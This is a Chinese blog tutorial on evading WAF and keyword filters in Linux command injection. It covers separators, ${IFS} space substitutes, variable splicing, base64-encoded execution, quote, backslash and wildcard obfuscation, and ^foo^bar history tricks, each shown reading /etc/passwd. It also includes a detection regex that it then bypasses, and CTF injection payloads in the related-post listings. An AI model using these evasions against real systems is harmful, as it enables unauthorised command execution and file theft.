linux命令绕过

已于 2023-12-22 10:15:00 修改
阅读量769 收藏 9
点赞数 7
文章标签: linux 运维 网络安全
于 2023-12-18 11:02:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46229380/article/details/135057593
版权

WAF绕过命令执行

1 命令分隔符

linux: && || & | ;

# &&绕过
[root@localhost ~]# echo 123&& cat /etc/passwd
123
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
# ||绕过
[root@localhost ~]# xxx||cat /etc/passwd
-bash: xxx: 未找到命令
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
...
# &绕过
echo 123&cat /etc/passwd
[1] 6643
123
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
...
#分号;在shell中担任连续指令的功能
 echo 123;cat /etc/passwd
123
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
...

2 命令执行绕过

2.1 绕过空格

${IFS}

$IFS$9 # 9 可改成 9可改成 9可改成加其他数字

示例

echo${IFS}123
123

${IFS}后面可以跟多个$1$9$@$*等等命令正常执行
echo${IFS}$1123
123
echo${IFS}$8$9$2123
123

重定向符<>
cat<>/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

{cat,flag.php} #用逗号,实现了空格功能
{cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

2.2 拼接

#在linux系统中

a=g;cat fla$a.php

a=fl;b=ag.php;cat a a ab

示例

a=cat;b=/etc/;c=passwd
root@ubuntu2204-186:/software/hidsagent-0.1.6# $a${IFS}$b$c
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

2.3 编码

示例

echo "cat${IFS}/etc/passwd" |base64
Y2F0IAkKL2V0Yy9wYXNzd2QK
$(echo "Y2F0IAkKL2V0Yy9wYXNzd2QK"|base64 -d)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

2.4 单引号、双引号绕过

示例

#单引号、双引号存在关键字任何位置都可以
cat /e''tc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

cat /""etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

2.5 反斜线绕过

cat /e\tc/passwd

示例

cat \/e\tc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

备注:cp、mv等之类需要交互输入yes的命令加上反斜线、单双引号都可以成为面交互形式(ubuntu cp、mv命令可以面交互执行多次)

[root@localhost ~]# cp test1.txt /opt/
[root@localhost ~]# cp test1.txt /opt/
cp:是否覆盖"/opt/test1.txt"? n
[root@localhost ~]# c\p test1.txt /opt/
[root@localhost ~]# \cp test1.txt /opt/
[root@localhost ~]# c''p test1.txt /opt/
[root@localhost ~]# c""p test1.txt /opt/
[root@localhost ~]# ''cp test1.txt /opt/
[root@localhost ~]# ""cp test1.txt /opt/
[root@localhost ~]# cp"" test1.txt /opt/

2.6 通配符绕过

*   代表『 0 个到无穷多个』任意字符
?   代表『一定有一个』任意字符
[ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符, 可能是 a, b, c, d 这四个任何一个』
[ - ]   若有减号在中括号内时,代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字,因为数字的语系编码是连续的!
[^ ]    若中括号内的第一个字符为指数符号 (^) ,那表示『反向选择』,例如 [^abc] 代表 一定有一个字符,只要是非 a, b, c 的其他字符就接受的意思。

示例

/?in/cat /?tc/p?sswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

2.7 ^foo^bar 危险

^foo^bar命令用于编辑以前运行的命令,而不需要重新输入整个命令。在不确定之前命令的作用之前,小心使用这个命令,防止出现不必要的麻烦。

什么意思呢看下面演示:

2.7.1 先看一个简单的例子,第一个^符号代替了上一个echo命令,第二个^符号加上一个关键字拼接到后面

echo first
first
[root@localhost ~]# ^first
echo

[root@localhost ~]# ^first^second
-bash: :s^first^second: substitution failed
[root@localhost ~]# echo first
first
[root@localhost ~]# ^first^second
echo second
second
[root@localhost ~]#
[root@localhost ~]# echo first
first
[root@localhost ~]# ^first^second
echo second
second

2.7.2 查看passwd案例

首先我写了一个正则过滤危险命令之查看敏感文件如下

egrep -E “(sudo[[:space:]]+)?((/.)?(cut|cat|tac|nl|more|less|head|tail|od|hexdump|grep|egrep|fgrep|rgrep|awk|sed|csplit|fmt|fold|mtype|sort|spell|uniq)[[:space:]]+./etc/.*)” test.f
find . -name test.f -exec cat “/etc/passwd” ;
cat /etc/rc.local
cat /etc/bashrc
cat -n /etc/passwd
less /etc/passwd
od /etc/passwd
cut -d ‘:’ -f 1 /etc/passwd
tac /etc/passwd
nl /etc/passwd
more /etc/passwd
less /etc/passwd
head /etc/passwd
tail /etc/passwd
hexdump -C /etc/passwd
hexdump -C /etc/passwd > 16passwd.txt
grep “root” /etc/passwd
awk ‘{print}’ /etc/passwd
sed -n ‘1,$p’ /etc/passwd
csplit /etc/passwd 1
fmt /etc/passwd
fold /etc/passwd
mtype /etc/passwd
mtype -xxx -xx /etc/passwd
sort /etc/passwd
spell /etc/passwd
uniq /etc/passwd
uniq -c -q /etc/passwd

此时我换成^符号,正则就识别不到head、cat等关键字了

head test1.txt
123
123
123
123
123
[root@localhost ~]# ^test1.txt^/etc/passwd
head /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin

格式化磁盘也是

#格式化演示,可想可知,如果前面输入的是正常格式化别的附加盘,没什么危险,但是下面^符合调用了上面的mkfs命令执行格式化系统盘
 mkfs.xfs xxx
xxx: 没有那个文件或目录
Usage: mkfs.xfs
/* blocksize */         [-b log=n|size=num]
/* metadata */          [-m crc=0|1,finobt=0|1]

[root@localhost ~]# ^xxx^ccc
mkfs.xfs ccc
ccc: 没有那个文件或目录
Usage: mkfs.xfs
/* blocksize */         [-b log=n|size=num]
/* metadata */          [-m crc=0|1,finobt=0|1]
这样的宋哥哥
关注
Linux命令执行绕过
SHELLCODE_8BIT的博客
04-19 901
Linux命令执行绕过_5wimming的博客-CSDN博客_linux命令执行绕过 nohub
linux常见绕过方法
wojiushilsy的博客
05-14 2487
空格过滤一些命令分隔符花括号的别样用法黑名单绕过 空格过滤 < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 一些命令分隔符 linux中:%0a 、%0d 、; 、& 、| 、&&、|| windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符) 花括号的别样用法 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag.
linux /etc/profile 对空格敏感。。。。
Alvin__Yang的博客
04-26 780
linux /etc/profile 对空格敏感。。。。
网络安全---Linux命令绕过Linux命令执行绕过技巧(很全,很实用)
最新发布
m0_67844671的博客
09-24 3274
Linux命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格绕过,关键字绕过,编码绕过等等;
Linux下的命令执行绕过技巧合集(渗透测试专用)
Thunderclap的博客
02-23 3792
Linux下的命令执行绕过技巧合集(渗透测试专用)
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
热门推荐
algae
08-29 1万+
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
linux命令绕过空格
09-01
Linux命令中,可以使用反斜杠(\)来绕过空格。当你需要在命令中输入带有空格的参数时,可以在空格前加上反斜杠。例如,如果你想要在命令行中打开一个文件名为 "my file.txt" 的文件,可以使用以下命令: ``` $ ...
命令执行绕过
weixin_57439582的博客
03-26 348
ca${21}t a.txt 利用空变量 使用$*和$@,$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下,上面的特殊变量都是为空的。cat$IFS$1$a$b.php 即可获取flag。//base64编码绕过(引号可以去掉) |(管道符) 会把前一个命令的输出作为后一个命令的参数。2.通过执行sh命令来执行 (bash被过滤了,不然也可以执行)
linux命令符号绕过
09-19
Linux中,可以使用一些特殊的符号来绕过命令过滤和执行特定操作。例如,可以使用$IFS变量来表示空格,并通过在命令中使用它来绕过过滤。还可以使用$9来代表制表符。下面是一些示例: - cat${IFS}flag.txt:使用...
绕过WAF运行命令执行漏洞的方法大全
hackzkaq的博客
10-09 2263
文章目录**前言****一、windows下**二、进入linux三、一个有趣的例子总结 前言 作者:掌控安全-桐镜 今天发散一下思维,聊聊关于命令执行漏洞绕过过滤的方法,让我们一起由浅入深。 一、windows下 1.1 符号与命令的关系 在看一个例子开始之前,首先了解一点,”和^这还有成对的圆括号()符号并不会影响命令的执行。在windows环境下,命令可以不区分大小写 whoami //正常执行 w"h"o"a"m"i //正常执行 w"h"o"a"m"i" //正常执行 wh"“oami //正常执
linux命令执行绕过,命令执行WAF绕过技巧总结
weixin_31106267的博客
04-29 730
*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。前言如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF的绕过技巧,Windows平台不在本文考虑范围内。0x01 技巧一:通配符在bash的操作环境中有一...
linux命令执行绕过,命令执行绕过
weixin_39689687的博客
04-29 2122
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?命令执行过滤函数与绕过机制escapeshellcmd函数:字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。(对可能进行欺骗命令执行函数的字符进行转义),下面来具体的看一下这个函数:再看一下源码(...
五种绕过 Linux 命令别名的方法
weixin_34087307的博客
03-13 461
我们可以使用 alias 命令定义或显示 bash shell 别名。一旦创建了 Bash shell 别名,它们将优先于外部或内部命令。本文将展示如何暂时绕过 bash 别名,以便你可以运行实际的内部或外部命令。 我在我的 Linux 系统中定义了以下 mount 别名: alias mount='mount | column -t' 但是,在我挂...
linux内联汇编,绕行和GCC内联汇编(Linux)
weixin_39579483的博客
05-16 167
这个项目是否开发了一个“框架”,允许其他人在不同的二进制文件中挂钩不同的功能?或者只是你需要挂钩你有这个特定的程序?首先,让我们假设你想要第二件事,你只需要一个二进制函数,你想挂钩,编程和可靠.普遍这样做的主要问题是,可靠地做到这一点是一场非常艰难的比赛,但如果你愿意做出一些妥协,那么它肯定是可行的.另外我们假设这是x86的事情.如果要挂钩函数,可以使用多种选项. Detours的内容是内联修补....
Linux下RCE绕过空格限制
weixin_44971601的博客
09-29 1427
Linux下RCE绕过空格限制
命令执行绕过总结
box
07-23 2287
命令执行绕过总结 Linux命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
命令执行各种绕过总结
m0_64815693的博客
10-11 9445
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值